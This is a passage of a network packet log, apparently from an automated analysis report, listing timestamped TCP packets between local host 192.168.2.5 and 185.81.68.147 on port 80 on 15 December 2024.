                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.358843088 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.358998060 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.359188080 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.360018015 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.360400915 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.361030102 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.361151934 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.361202002 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.361342907 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.362291098 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.362461090 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.362756014 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.363434076 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.363589048 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.364535093 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.364662886 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.364741087 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.365395069 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.365741014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.411328077 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.497181892 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.497242928 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.497466087 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.497638941 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.497782946 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.497916937 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.498866081 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.499135017 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.499447107 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.499952078 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.500108004 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.500232935 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.501231909 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.501291990 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.501414061 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.502290010 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.502377033 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.502543926 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.503462076 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.503597021 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.504698992 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.504803896 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.504831076 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.504981995 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.505861998 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.505883932 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.506020069 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.506927013 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.507071972 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.507263899 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.508059025 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.508225918 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.508352995 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.509259939 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.509471893 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.509902000 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.510426998 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.510571957 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.510767937 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.511621952 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.511682034 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.511800051 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.512737989 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.512840033 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.513318062 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.513916016 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.514005899 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.514096975 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.515094995 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.515165091 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.515358925 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.516298056 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.516627073 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.516870975 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.517416954 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.517512083 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.517678976 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.518677950 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.518699884 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.519026995 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.519797087 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.519817114 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.519984007 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.520982981 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.520997047 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.521300077 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.522167921 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.522190094 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.522320986 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.523297071 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.523322105 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.703836918 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.703934908 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.703953028 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.705070972 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.705162048 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.705183983 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.706111908 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.706231117 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.706522942 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.707278013 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.707379103 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.707498074 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.708441973 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.708534002 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.708940983 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.709605932 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.709702015 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.709832907 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.710741043 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.710865021 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.710895061 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.711905956 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.712025881 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.712157965 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.713154078 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.713265896 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.713360071 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.716973066 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.717044115 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.717398882 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.717422009 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.717487097 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.717550993 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.717581987 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.717638969 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.717742920 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.718780994 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.718880892 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.718914986 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.719501972 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.719526052 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.719547033 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.720035076 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.720143080 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.720170021 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.723102093 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.723181963 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.723237991 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.724104881 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.724184990 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.724267960 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.724634886 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.724654913 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.724746943 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.725837946 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.725872993 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.725929976 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.726910114 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.726929903 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.726952076 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.727979898 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.728163004 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.728188992 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.729197025 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.729307890 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.729379892 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.729598045 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.729620934 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.729659081 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.730488062 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.730549097 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.730582952 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.731659889 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.731740952 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.731750965 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.732886076 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.732989073 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.733669996 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.733985901 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.734074116 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.735151052 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.735172033 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.735198975 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.735222101 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.736294985 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.736361980 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.736392975 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.737517118 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.737597942 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.737607002 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.738641024 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.738715887 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.738728046 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.739778042 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.739835024 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.739866972 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.741048098 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.741142035 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.922498941 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.922549009 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.923623085 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.923645973 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.923727036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.924591064 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.924848080 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.924921036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.925952911 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.925976992 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.926050901 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.926146030 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.927104950 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.927217007 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.928255081 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.928380966 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.928565979 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.929430962 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.929555893 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.929769039 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.930582047 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.930699110 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.930807114 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.931736946 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.931843996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.932029963 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.932917118 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.933022022 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.933346987 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.934109926 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.934206963 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.934614897 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.935234070 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.935343027 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.936405897 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.936491013 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.936846018 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.937586069 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.937637091 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.938731909 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.938858986 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.939871073 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.939898968 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.939965963 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.940069914 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.941050053 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.941198111 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.941364050 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.942168951 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.989424944 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.073654890 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.073682070 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.073795080 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.074069023 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.074145079 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.074569941 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.075226068 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.075324059 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.076355934 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.076476097 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.076504946 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.076631069 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.077517986 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.077646971 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.077897072 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.078661919 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.078783989 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.078866005 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.079842091 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.080034971 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.080225945 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.081027031 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.081125975 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.081283092 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.082139015 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.082238913 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.082328081 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.083349943 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.083369017 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.083530903 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.084487915 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.084588051 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.084856033 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.085655928 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.085804939 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.086241961 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.086786985 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.086884022 CET8049708185.81.68.147192.168.2.5
